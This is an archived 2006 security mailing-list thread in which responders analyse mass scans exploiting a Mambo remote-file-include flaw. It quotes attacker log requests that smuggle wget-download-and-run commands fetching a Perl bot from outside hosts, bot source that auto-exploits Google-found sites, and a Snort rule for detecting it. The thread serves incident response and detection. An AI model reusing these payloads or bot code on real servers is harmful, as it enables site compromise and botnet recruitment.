Security Incidents mailing list archives
Re: High volume of Mambo scans (perlb0t)
From: Daniel Cid <danielcid () yahoo com br>
Date: Mon, 15 May 2006 10:54:47 -0300 (ART)
I was looking at the scripts they try to download and it does not looks like a common perl bot (connecting to irc). It's also written in php and by a brazilian person (comments in portuguese) and with a terrible code :) I didn't have time to fully look at it, though. These are the pages they access: http://usuarios.lycos.es/athos666/d25/ http://usuarios.lycos.es/athos666/d25/therules25.dat http://radius01.comete.ci/tool.gif I'm attaching them just in case they remove these pages (please be aware that they are scripts, not gifs :)). Thanks, -- Daniel B. Cid dcid @ ( at ) ossec.net --- Jamie Riden <jamesr () europe com> escreveu:
Seems to have some kind of google search code for
the particular
vulnerability - haven't seen this before:
if ($funcarg =~ /^google\s+(\d+)\s+(.*)/) {^M
sendraw($IRC_cur_socket, "PRIVMSG
$printl
:\002[GOOGLE]\002 Scanning for unpatched mambo for
".$1."
seconds.");^M
srand;^M
my $itime = time;^M
my ($cur_time);^M
my ($exploited);^M
$boturl=$2;^M
$cur_time = time - $itime;$exploited =
0;^M
while($1>$cur_time){^M
$cur_time = time - $itime;^M
@urls=fetch();^M
foreach $url (@urls) {^M
sendraw($IRC_cur_socket,
"PRIVMSG $printl
:\002[GOOGLE]\002 Trying to exploit ".$url);^M
$cur_time = time - $itime;^M
my $path = "";my $file =
"";($path, $file) =
$url =~ /^(.+)\/(.+)$/;^M
$url
=$path."/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=$boturl?";^M
$page = http_query($url);^M
$exploited = $exploited +
1;^M
}^M
}^M
sendraw($IRC_cur_socket, "PRIVMSG
$printl
:\002[GOOGLE]\002 Exploited ".$exploited." boxes in
".$1."
seconds.");^M
This is a quick stab at a snort sig:
alert tcp $EXTERNAL_NET !21:443 -> $HOME_NET !80
(msg: "BLEEDING-EDGE
perlb0t Bot Reporting Scan/Exploit"; flow:
to_server,established;
content:"PRIVMSG|20|"; nocase; within: 80; tag:
session, 20, packets;
pcre:"/(GOOGLE|HTTP|TCP|SCAN|UDP|VERSION)/i";
within:16;
pcre:"/(Exploiting|Exploited}Attacking|Scanning|perlb0t)/i";
classtype: trojan-activity; sid: xxxx; rev:1; ) but I'm sure this could be improved. cheers, Jamie On 15/05/06, Jamie Riden <jamesr () europe com> wrote:Looks like some sort of shellbot wanting toconnect to an IRC channel#abusers on abuser.hacked.in:8080. I've been seeing occaisonal probes for Mambo'sindex.php on and offfor a while now - the first part is similar to
http://nz-honeynet.org/papers/mambo-exploit-obfuscated.pdf
but thepayloads are slightly different, though it alwaysseems to end up withan IRC bot of some kind. I usually see them coupled with scans forcoppermine and other remoteinclude issues, plus xmlrpc probes. I think you're seeing an attempt to exploitissue#3 here -http://secunia.com/advisories/18935/ cheers, Jamie On 14/05/06, Daniel Cid <danielcid () yahoo com br>wrote:Since Thursday night I'm seeing a high volume ofscanson different web servers for possibly thefollowingvulns: http://secunia.com/advisories/14337/http://www.osvdb.org/displayvuln.php?osvdb_id=10180However, they say the problem is on function.phpandI'm seeing them on index.php. Can anyone confirmthat?Some log samples: 200.80.39.39 - - [12/May/2006:15:27:28 -0300]"GET
/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://luxsurf.com/images/cmd.txt?&cmd=cd%20/tmp;wget%20http://luxsurf.com/images/xentonix;perl%20xentonix;rm%20-rf%20xentonix?
HTTP/1.0" 404 167 "-" "Mozilla/5.0" 217.160.131.47 - - [12/May/2006:15:34:30 -0300]"GET
/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://toma.si/dare/cmd.txt?&cmd=cd%20/tmp;wget%20http://toma.si/dare/xentonix;perl%20xentonix;rm%20-rf%20xentonix?
HTTP/1.0" 404 167 "-" "Mozilla/5.0" 58.26.138.159 - - [12/May/2006:16:03:47 -0300]"GET
/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://toma.si/dare/cmd.txt?&cmd=cd%20/tmp;wget%20http://toma.si/dare/xentonix;perl%20xentonix;rm%20-rf%20xentonix?
HTTP/1.0" 404 167 "-" "Mozilla/5.0" 200.80.39.39 - - [12/May/2006:16:27:28 -0300]"GET
/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://luxsurf.com/images/cmd.txt?&cmd=cd%20/tmp;wget%20http://luxsurf.com/images/xentonix;perl%20xentonix;rm%20-rf%20xentonix?
HTTP/1.0" 404 167 "-" "Mozilla/5.0" 217.160.131.47 - - [12/May/2006:16:29:30 -0300]"GET
/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://toma.si/dare/cmd.txt?&cmd=cd%20/tmp;wget%20http://toma.si/dare/xentonix;perl%20xentonix;rm%20-rf%20xentonix?
HTTP/1.0" 404 167 "-" "Mozilla/5.0" 58.26.138.159 - - [12/May/2006:16:36:47 -0300]"GET
/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://toma.si/dare/cmd.txt?&cmd=cd%20/tmp;wget%20http://toma.si/dare/xentonix;perl%20xentonix;rm%20-rf%20xentonix?
HTTP/1.0" 404 167 "-" "Mozilla/5.0" 212.87.13.140 - - [12/May/2006:16:50:02 -0300]"GET
/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://radius01.comete.ci/tool.gif?&cmd=cd%20/tmp/;wget%20http://radius01.comete.ci/session.gif;perl%20session.gif;rm%20-rf%20session.*?
HTTP/1.0" 404 167 "-" "Mozilla/5.0"-- Jamie Riden / jamesr () europe com /jamie.riden () computer orgNZ Honeynet project - http://www.nz-honeynet.org/-- Jamie Riden / jamesr () europe com / jamie.riden () computer org NZ Honeynet project - http://www.nz-honeynet.org/
_______________________________________________________
Navegue com o Yahoo! Acesso Grátis, assista aos jogos do Brasil na Copa e ganhe prêmios de hora em hora!
http://br.yahoo.com/artilheirodacopa/Attachment:
therules25.dat
Description: 1269156576-therules25.dat
Current thread:
- Re: High volume of Mambo scans (perlb0t) Jamie Riden (May 14)
- Re: High volume of Mambo scans (perlb0t) Daniel Cid (May 15)
- Re: High volume of Mambo scans (perlb0t) Yuri Slobodyanyuk (May 15)
- Re: High volume of Mambo scans (perlb0t) Peter Kosinar (May 15)
- Re: High volume of Mambo scans (perlb0t) Daniel Cid (May 15)